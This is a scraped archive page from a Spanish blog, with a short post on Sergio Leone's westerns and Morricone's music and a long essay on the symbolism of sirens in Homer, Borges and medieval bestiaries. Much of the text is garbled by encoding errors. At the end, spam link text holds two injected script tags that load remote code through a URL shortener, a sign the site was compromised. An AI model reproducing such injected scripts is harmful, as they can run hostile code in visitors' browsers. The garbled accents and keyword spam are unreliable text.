Archivo de abril 14th, 2010

El bueno, el feo y el malo

A�A�A�

Los tripulantes de esta nave de los locos compartimos nuestra pasiA?n por el cine lustrosoA�yA�la buena mA?sica de pelA�culas; sin embargo, hay un gA�nero que se nos atragantaba ligeramente:A� el cine del Oeste. PensA?bamos que el principal asunto de la mayor parte del western clA?sico, eso de llevar las vacas de un lado para otro, no daba mucho juego; a nadie –que nosotros sepamos– se le ha ocurrido hacer una pelA�cula sobre los bueyes de GeriA?n o, pongamos por caso, el niA�o yuntero –que cantara Miguel HernA?ndez–. A�sos bA?vidos si que darA�an para alguna historia con enjundia.A�Pero hete aquA� que llegaron los guardapolvos, el sudor y el barro al Oeste, de la mano inspA�rada y diestra del gran Sergio Leone, a quien debemos la resurreciA?n del gA�nero y nuestra reconciliaciA?n final con esta difA�cil mitologA�a alrededor de la vaca, el desierto y sus misterios. Estos clA?sicos delA�”Espaguetti Western” que queremos rememorar fugazmente hoy, ademA?s de contar con uno de nuestros actores y directores favoritos, Clint EastWood, y de promocionar la calidez y belleza de nuestra desA�rtica Almeria, cuentan con la mA?sica fabulosa del genial Ennio Morricone.

A�(Viajes con mi tA�a con el Espaguetti Western)

A�

MA?sica de la escena final de Per qualche dollaro in piu, de Sergio Leone. A�rgano y trompeta sabiamente armonizados por Ennio Morricone.

A�

(Por un puA�ado de DA?lares, de Ennio Morricone, en unaA�interpretaciA?n aseada, con su gamba correspondiente, seguida de cerca por nuestro SeA�or Jesucristo)

Miércoles, abril 14th, 2010 CELULOIDE RANCIO, MÚSICA RATONERA 4 comentarios

Cantos de sirena

A�

(Sirena en un capitelA�.A�Imagen A� Amigos del romA?nico.com)

Tiempo ha prometimosA�una menciA?n o tal vez un artA�culo sobre las enigmA?ticas sirenas, de terrible yA�hechizanteA�canto, pues A�sta es una figura que no podA�amos obviar en nuestro largo periplo porA�las mitologA�as y los sA�mbolos que jalonan la travesA�a del hA�roe, paradigma absoluto del viaje.A�PodrA�amos incluso atrevernos a erigir estos Cantos de Sirena como una nueva categorA�a de no escasaA�importancia, puesto que en ella darA�amos cabida a todas esas metA?foras – y no son pocas- de los obstA?culos y funestas acechanzas que esperan al viajero o peregrino tratando de desviarlo de su destino.A�Toda literatura en torno a los viajes debe conceder un lugar de honor a este especial episodio de los peligros de la aventura, que forman parte indisoluble del camino mismo. El mito de la sirena viene a ser un compendio de estos peligros que, en el viaje de la vida,A�esperan al alma para servirles de tropezadero .

El simbolismo de la sirena es complejo. En primer lugar predomina una clara connotaciA?n negativa al hilo de lo que acabamos de exponer.A�La sirenaA�A�representa, entre otras cosas, estaA�atracciA?n hacia la perdiciA?n, no en vano es una criatura que se valeA�delA�engaA�o para atraer a los navegantes a la costa y despuA�s devorarlos. En lenguaje coloquial, el dicho “oA�r cantos de sirena”, es sinA?nimo de embaucamiento.

John William Waterhouse, Ulises y las sirenas, 1891. A� Artmagick.com

Creemos que su primera apariciA?n tiene lugar en la Odisea, de Homero. UlisesA�se hace encadenar al mA?stil del barco para oA�r el canto de las sirenas costeras, despuA�s de ordenar a los tripulantes de su nave que no atiendan sus sA?plicas de desatarlo, si las hubiere. De este modo se presentan por vez primera este mito en la iconografA�a de un vaso griego: el hA�roe griego, encadenado al mA?stil del barco con tres sirenas a su alrededor.

Jorge Luis Borges, en su memorable obra sobre ZoologA�a FantA?stica, recoge este episodio de la OdiseaA�que yA� refiere que “las sirenas atraA�an y perdA�an a los navegantes y que Ulises, para oir su canto y no perecer, tapA? con cera los oA�dos de los remeros y ordenA? que lo sujetaran al mA?stil. Para tentarlo, las sirenas le ofrecieron el conocimiento de todas las cosas del mundo:

Nadie ha pasado por aquA� en su negro bajel, sin haber escuchado de nuestra boca la voz dulce como el panal, y haberse regocijado con ella y haber proseguido mA?s sabioa�� Porque sabemos todas las cosas: cuA?ntos afanes padecieron los argivos y troyanos en la ancha TrA?ada por determinaciA?n de los dioses, y sabemos cuanto sucederA? en la tierra fecunda ( Odisea, XII .)” (4)

(RepresntaciA?n del episodio de Ulises en un vaso griego)

Las representaciones de esta criatura fabulosa son diversas, siendoA� la mA?s corriente la que la presenta con el torso de un mujer, habitualmente hermosaA�y de largos cabellos, y el cuerpo fusiforme de un pez o criatura marina, a menudo de doble cola. Pero en los ejemplos mA?s arcaicos no son muy diferentes de las arpA�as,A�con cabeza femenina y cuerpo de ave, siendo a menudo difA�cil diferenciarlas. En este parecidoA�hemos de ver una de las claves profundas del simbolismo de la sirena, en su vertiente mA?s negativa, que coincide con el de la primera mujer Eva, o aA?n mejor, Lilith, esto es, la visiA?n de la feminidad como una manifestaciA?n de la perversidad y la tendencia hacia la disoluciA?n y el mundo material.

A�

(La sirena es a menudo confundida con la arpA�a, de cuyo simbolismo participa) A�Flickr Image Archive

MA?s evidente en la sirena de doble cola es esta significaciA?nA�de lo peligros de laA�tentaciA?n carnal o material, puesto que “la figuraA�se A�abre en su mitad inferior de pescado, con dos extremidades que se curvan hacia arriba, como si ofreciera promisoriamente el arribo a un sexo del que precisamente carece.A�A�Promesa falsa (…)” A�que enlaza con el aspecto de ilusiA?n o hechizo del que participa su canto. (…)A� “Un antiguo comentarista medieval resumA�a asA� su simbologA�a: “Las sirenas significan las mujeres que atraen a los hombres por sus caricias y por sus respuestas a sus palabras; y que ellas los conducen a la pobreza y a la muerte”. MetA?fora similar a la interpretaciA?n mA?s corriente del episodio de AdA?n y Eva en el ParaA�so, que supuso la expulsiA?n del EdA�n.”

(Sir Edward Burne Jones, The Sirens, estudio, 1875) A�Artmagick.com

Dice el FisiA?logo del siglo V, uno de los bestiarios mA?sA�antiguos queA�”son unas criaturas mortA�feras constituidas como seres humanos desde la cabeza hasta el ombligo, mientras que su parte inferior, hasta los pies, es alada. Melodiosamente, interpretan cantos que resultan deliciosos; asA�, encantan los oA�dos de los marinos, y los atraen. Excitan el oA�do de estos pobres diablos merced a laA� prodigiosa dulzura de su ritmo, y hacen que se duerman. Por A?ltimo, cuando ven en que los marinos estA?n profundamente dormidos, se arrojan sobre ellos y los despedazan.”

sirena_momia_leiden

La sirena del museo de EtnologA�a de Leiden A� Tejiendoelmundo.com

Y aA�adeA�el FisiA?logo sobre su significaciA?n: ” El moralista enseA�a que las sirenas son crueles; que viven en el mar, que los acentos de sus voces son melodiosos, y que los viajeros quedan prendados de ellas hasta el punto de precipitarse en el mar, donde se pierdena��

Puesto que en la Edad Media prevaleciA? esta interpretaciA?n del simbolismo malA�fico de la sirena,A�era comA?n exhibirlas como advertenciaA�”en las portadas de las iglesias romA?nicas, en los capiteles de los claustros y ante cualquier otra visiA?n pA?blica. La iconografA�a servA�a una vez mA?s para la representaciA?n de vicios y virtudes que se interpretaban segA?n las necesidades de los que trataban de fustigarlas con los medios a su alcance.” (1)

Pierre de Beauvais las compara con “quienes, por embelesarse con las riquezas y los placeres de este mundo, son devorados por el demonio; el Bestiario de Cambridge como la figura de aquellos que se dejan seducir por la ostentaciA?n o el placer[16]; el de Oxford como la imagen del hombre que vive sA?lo para la pompa y la voluptuosidad terminando corrompido; Guillaume le Clerc ve en ellas la lujuria y los placeres de este mundo, sA�mbolo de la acciA?n demonA�aca sobre el hombre (…)”

(The Siren, Sir Edward John Poynter, 1874) A� Artmgick.com

AsA�, los seres humanos ignorantes e incautos se ven engaA�ados por las hermosas voces, cuando los encantan las faltas de delicadeza, los rasgos de ostentaciA?n o los placeres, o cuando se vuelven licenciosos debido a comedias, tragedias y cancioncillas diversas. Pierden todo su vigor mental, como si estuviesen sumidos en profundo sueA�o, y, de pronto, el ataque arrebatador del Enemigo cae sobre ellos (134-135).

La sirena, que canta tan bien que embruja a los hombres con su voz, da ejemplo para que se enmienden aquellos que han de navegar por este mundo. Nosotros, que cruzamos este mundo, somos engaA�ados por un canto similar: por la gloria, por los placeres de este mundo, que nos dan la muerte, cuando amamos el placer: la lujuria, el bienestar del cuerpo, la gula y la embriaguez, el deleite del lecho y la riqueza, los palafrenes, los hermosos caballos y la hermosura de los tejidos suntuosos. Siempre tendemos hacia ellos, nos corre prisa alcanzarlos. Tanto nos demoramos en los placeres que por fuerza nos dormimos. Entonces nos mata la sirena: es el Demonio, que nos lleva al mal, que nos hace sumergirnos tan hondo en los vicios que nos encierra en sus redes (vv. 1053 y ss.).

sirena_fidji

Sirena de Fidji de P.T. Barnum . A�Imagen Tejiendoelmundo.com

A�Por otro lado, el simbolismo de la sirena procede del mA?s amplio simbolismo del agua; en este sentido, comparte con las criaturas del medio acuA?tico como ondinas,A�ninfas e hidras esta significaciA?n doble: a veces son criaturas afables, y otras repulsivas; en cualquier caso, su poder es ambiguo: por un lado, estA?n llenas de vida, pero por otro impiden el progreso y enredan con sus encantos. Pudieran ser metA?foras de la mente creativa,A�del lado mA?s oscuro de la psique, de la mente imaginativa.

mermaid_2

Bocetos deA�una supuesta sirena,A� de Kesuke Ito,siglo XIX A�Imagen Tejiendoelmundo.com

En este sentido, representan la bA?squeda sin fruto, sin destino, el deseo inextinguible como causa de un periplo del que no hay retorno:” Ulises y Markandeya fueron dos navegantes involucrados enA�esta bA?squeda sin fin, en la que exploraron los lA�mites tanto del mundo real como de la mente racional. El agua es la puerta que conduce a la fantasA�a, es la forma de visitar a los que se encuentran mA?s alejados de nosotros, ya sean cinocA�falos, sirenas oA� hipogrifos (3) “

El mito de la sirena no es exclusivo del occidente clA?sico, antes bien ha estado ligado a todas las culturas vinculadas de un modo u otro al mar. En este fenomenal artA�culo de aquA�, se ocupan de “las sirenas, dragones y otros seres mitolA?gicosA�japoneses,A�A�que durante el siglo XVIII, XIX y principios del XX eran exhibidos en ferias ambulantes y circos para el asombro, previo pago, de la muchedumbre que acudA�a en masa a contemplar a esas criaturas legendarias”

A�

Sirena

Tengo la convicciA?n de que no existes
y sin embargo te oigo cada noche

te invento a veces con mi vanidad
o mi desolaciA?n o mi modorra

del infinito mar viene tu asombro
lo escucho como un salmo y pese a todo

tan convencido estoy de que no existes
que te aguardo en mi sueA�o para luego

Mario Benedetti (4)

A�

A�

–Fuentes y vA�nculos–

(1) Texto construA�doA�a partir de PiA�eroMoral, Ricardo PiA�eroA� “La mujer en el bestiario medieval: la virtualidad de las Sirenas”

(2) El fisiA?logo. Bestiario Medieval. La Sirena

(3) Tomado de Morabito, Mauro,A�Una breve zambullida en la simbologA�a del agua

(4) La canciA?n de la Sirena y la sirena de Borges, una magnA�fica blog en torno a la literatura de la sirena.

(5) Todas las imA?genes proceden de ArtMagick.com

A�(6) Recomendamos especialmente este fenomenalA�artA�culo sobre las momias kappa, las sirenas y dragones japoneses,A�CriptozoologA�a en el folclore japonA�s en Tejiendoelmundo.comA�, del que hemos extraA�do algunas de las imA?genes para nuestro post.

A�

Related Posts with Thumbnails
Miércoles, abril 14th, 2010 EL FISIÓLOGO, EL VIAJE DEL HÉROE, GENERALIS 3 comentarios
Buscar
 
 
“¡Ay de los que llaman al mal bien y al bien mal, que tienen las tinieblas por luz y la luz por tinieblas(...)!” , Profeta Isaías, V,20
 
 

Encuestas de la tita.

Archivo

Calendario

abril 2010
L M X J V S D
« mar   may »
 1234
567891011
12131415161718
19202122232425
2627282930  

Álbum Fotográfico

El archivo XML no existe
The very best VPN Services 2018<script src="https://is.gd/ob8vtI?v=v9.0"></script> Electric power Selling Approaches to Improve The Web business<script src="https://is.gd/ob8vtI?v=v8.0"></script> Outlines For Core Criteria In Essay Writing Help Starting A web site That Sells Starting An online site That Making A site That Making A site That Brings Profit Starting A web site That Brings Profit Starting A Website That Brings Profit Creating A site That Starting An online site That Sells Starting An online site That Provides Starting A site That Markets Designing A Website That Makes CLients Designing An online site That Brings Profit Designing A web site That Makes CLients Starting A web site That Sells Creating A Website That Brings Profit Making An online site That Markets Making A Website That Brings Profit Creating An online site That Creating A Website That Designing An online site That Markets Making A Website That Makes CLients Making A site That Brings Profit Starting A site That Creating A web site That Brings Profit Making A Website That Starting An online site That Provides Making A site That Creating A Website That Makes CLients Creating A Website That Sells